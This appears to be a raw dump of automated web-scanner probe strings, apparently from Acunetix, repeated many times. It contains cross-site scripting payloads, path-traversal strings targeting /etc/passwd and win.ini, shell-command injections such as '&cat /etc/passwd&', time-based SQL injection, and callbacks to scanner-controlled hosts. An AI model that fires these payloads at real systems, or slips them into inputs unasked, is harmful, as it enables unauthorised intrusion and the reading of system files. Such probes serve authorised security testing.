1<ScRiPt >prompt(949769)</ScRiPt>

1

1

1

response.write(9750270*9046571)

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(903179)">

WEB-INF/web.xml

'&cat /etc/passwd&'

1

'+response.write(9750270*9046571)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960150)"></g></svg>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9750270*9046571)+"

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(901898))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1<iframe src='data:text/html

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<body onload=prompt(980390)>

1

1

${99670+99437}

1

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973562)>

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n924396=v918340

)

1

1

1some_inexistent_file_with_long_name%00.jpg

TWEifTdU'

1<img src=xyz OnErRor=prompt(922014)>

!(()&&!|*|*|

'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(958529)>

mWlVcMLd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

5gL4gvna'))

'

1<ScRiPt%20>prompt(989339)</sCripT>

1

1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

"

-1

||cat /etc/passwd

1

1

1

/etc/passwd

1

1

\xf6<img acu onmouseover=prompt(928638) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

&dir

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(927422)>

http://hitD1yzvTIw5U.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

'&dir&'

comments

1

1

1

gOSBRRBY'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

"&dir&"

yaUT1GyO')

1

[url=http://www.acunetix.com]website security[/url]

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

UIYhEFlI'))

comments/.

http://www.acunetix.tst

1

1

'"

1

1_lcUZZ <ScRiPt >prompt(906576)</ScRiPt>

1

1

1

1

'|dir

1'"()&%<ScRiPt >prompt(977914)</ScRiPt>

1

1

file:///etc/passwd

<!--

'"()&%<ScRiPt >prompt(970717)</ScRiPt>

"|dir

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_961760

1

WEB-INF/web.xml

1

1

1

1

1

1

1

acu7481\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7481

WEB-INF\web.xml

1

1

1

1

acux9545\xc0\xbez1\xc0\xbcz2a\x90bcxuca9545

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(980558)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1<script>prompt(997748)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(950400)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914506></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(990501)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(909061)">

1

response.write(9640583*9345491)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918877)"></g></svg>

1

1

1

'+response.write(9640583*9345491)+'

1

1<div style=width:expression(prompt(961464))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

"+response.write(9640583*9345491)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(974583)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926033)>

1

`cat /etc/passwd`

-1

1

1<img src=xyz OnErRor=prompt(956212)>

1

WEB-INF\web.xml

${99762+99829}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(933013)>

-1)

|cat /etc/passwd#

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(931052)</sCripT>

1

'|'ld

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n947469=v946632

)

/etc/passwd

PcOkCIbB'

"|"ld

1

'"()

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(926712) //\xf6>

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

hpq9vzRM')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(960542)>

1

1

MRU3Aa74'))

1

'

1

<a href='http://www.acunetix.com'>website security</a>

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

http://hittiS2bgoCwH.bxss.me/

-1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

-1)

1

1_plmMU <ScRiPt >prompt(906588)</ScRiPt>

acunetix_wvs_invalid_filename

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

-1))

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

cugiMSCD'

http://www.acunetix.tst

'&dir&'

1

comments

1

1

1

1

"&dir&"

comments/.

1

1

DqJZj15Z')

WEB-INF/web.xml

|dir

1'"()&%<ScRiPt >prompt(919781)</ScRiPt>

'"

1

1

WEB-INF\web.xml

i7qJNfCd'))

1

1

'|dir

1

<!--

'"()&%<ScRiPt >prompt(944940)</ScRiPt>

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1_919759

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu4252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4252

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux9919\xc0\xbez1\xc0\xbcz2a\x90bcxuca9919

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(902669)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(956461)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(975825)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901718></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(965294)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(945242)">

1

1

WEB-INF\web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944141)"></g></svg>

1

1

1

response.write(9593054*9334837)

1

1<div style=width:expression(prompt(925804))>

1

&cat /etc/passwd&

'+response.write(9593054*9334837)+'

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

1

1

"+response.write(9593054*9334837)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(903380)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900189)>

-1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

1<img src=xyz OnErRor=prompt(984000)>

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99823+99588}

-1))

'|'ld

1

1<img/src=">" onerror=alert(924542)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

3kwgDYnt'

1

1

1&n908127=v980626

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

zLPgkoR6')

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(967253)</sCripT>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

6yyGysgx'))

'

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

"

1

1

\xf6<img acu onmouseover=prompt(999230) //\xf6>

'

1

-1)

1

||cat /etc/passwd

^(#$!@#$)(()))******

/etc/passwd

1

1

-1))

"

1

1<input autofocus onfocus=prompt(943469)>

1

oaZXInv9'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

http://hitSgkaWOWEqa.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

HeRQr07x')

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

9cQsg0gt'))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

comments

"&dir&"

1

1

1_zcj8O <ScRiPt >prompt(971488)</ScRiPt>

1

1

file:///etc/passwd

|dir

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

'"

1

1

WEB-INF/web.xml

1

1

1'"()&%<ScRiPt >prompt(918875)</ScRiPt>

1

1

"|dir

<!--

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(968279)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1_933174

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu1441\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1441

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux10746\xc0\xbez1\xc0\xbcz2a\x90bcxuca10746

................windowswin.ini

1

1<ScRiPt >prompt(983442)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(959987)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(969369)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904259></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(910715)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(942779)">

response.write(9778962*9746126)

WEB-INF/web.xml

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980154)"></g></svg>

'+response.write(9778962*9746126)+'

WEB-INF\web.xml

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(998726))>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

"+response.write(9778962*9746126)+"

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

"&cat /etc/passwd&"

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(989672)>

1

1

cat /etc/passwd

${100067+99853}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952244)>

1

1

1

`cat /etc/passwd`

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

)

1&n991210=v906826

1

1<img src=xyz OnErRor=prompt(945626)>

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

99q0Kv1N'

'|'ld

!(()&&!|*|*|

1<img/src=">" onerror=alert(989202)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

J0p9wRWf')

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(901774)</sCripT>

testasp.vulnweb.com

1

1

'"()

1

/etc/passwd

1&lt

KH418Gdr'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

'

1

\xf6<img acu onmouseover=prompt(917797) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1<input autofocus onfocus=prompt(968306)>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

http://hitvr1o44LyKp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

acunetix_wvs_invalid_filename

1

1

S6vAaqAE'

1

file:///etc/passwd

[url=http://www.acunetix.com]website security[/url]

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

zyAsWvMC')

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

comments

1_dvJfD <ScRiPt >prompt(976465)</ScRiPt>

'&dir&'

<!--

1

WEB-INF/web.xml

duFUCBX2'))

1

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(975619)</ScRiPt>

1

1

1

1

1

WEB-INF\web.xml

|dir

1

'"()&%<ScRiPt >prompt(925147)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

1_962297

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

acu5436\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5436

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2047\xc0\xbez1\xc0\xbcz2a\x90bcxuca2047

1

1

1

1<ScRiPt >prompt(987329)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(981813)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(952627)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908115></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(995791)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(963121)">

1

1

WEB-INF/web.xml

response.write(9849938*9642435)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981149)"></g></svg>

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940403))>

1

'+response.write(9849938*9642435)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9849938*9642435)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(938986)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943864)>

${99747+99177}

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(965142)>

1

`cat /etc/passwd`

-1)

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

)

1&n912202=v990119

1<img/src=">" onerror=alert(948637)>

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

'|'ld

1

1<ScRiPt%20>prompt(987400)</sCripT>

!(()&&!|*|*|

testasp.vulnweb.com

1

H4Ule98E'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

'"()

^(#$!@#$)(()))******

1&lt

1

qZxNoNos')

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(902181) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

YrKphJ1t'))

1

1

1

1

'

/etc/passwd

1<input autofocus onfocus=prompt(922473)>

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

acunetix_wvs_invalid_filename

1

-1)

http://hit0m4143EDPp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

comments

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1_D2Ibe <ScRiPt >prompt(987082)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

vPhTav4p'

comments

&dir

1

1

1

'"

1

http://www.acunetix.tst

nMVSwxPu')

comments/.

1'"()&%<ScRiPt >prompt(934881)</ScRiPt>

1

1

'&dir&'

<!--

1

1

1

LKLgL6Ee'))

'"()&%<ScRiPt >prompt(926784)</ScRiPt>

1

"&dir&"

1

1

1

file:///etc/passwd

1

1_916007

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'|dir

1

1

1

WEB-INF/web.xml

1

"|dir

acu1968\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1968

WEB-INF\web.xml

1

1

1

acux8137\xc0\xbez1\xc0\xbcz2a\x90bcxuca8137

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(918715)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(939234)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(986788)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976454></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1<ScRiPt >prompt(984191)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(985855)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929713)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(933008))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9983030*9673908)

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9983030*9673908)+'

&cat /etc/passwd&

1

1<body onload=prompt(993361)>

'&cat /etc/passwd&'

"+response.write(9983030*9673908)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920054)>

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(930193)>

WEB-INF\web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img/src=">" onerror=alert(994448)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

${100394+100278}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(950685)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

1&lt

1

1&n909023=v914631

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(911742) //\xf6>

)

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(921073)>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

"|"ld

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

By3fx5XD'

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

'"()

1

'

1

1

7oaxLUQc')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

"

1

1_2MOn5 <ScRiPt >prompt(970995)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

l3IrWuBu'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

http://hit1Z4MXmVgds.bxss.me/

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

-1))

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

file:///etc/passwd

'"

gpCnOIX1'

comments

1

1

|dir

<!--

1'"()&%<ScRiPt >prompt(941692)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

comments

1

uSjV8pfK')

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902343)</ScRiPt>

"|dir

comments/.

1

DRksQVsT'))

1

1

1

1

1

1_949707

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7477\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7477

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux4344\xc0\xbez1\xc0\xbcz2a\x90bcxuca4344

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(996991)</ScRiPt>

1

1

................windowswin.ini

1

1

1

1<script>prompt(972097)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(990517)</ScRiPt>

1

1

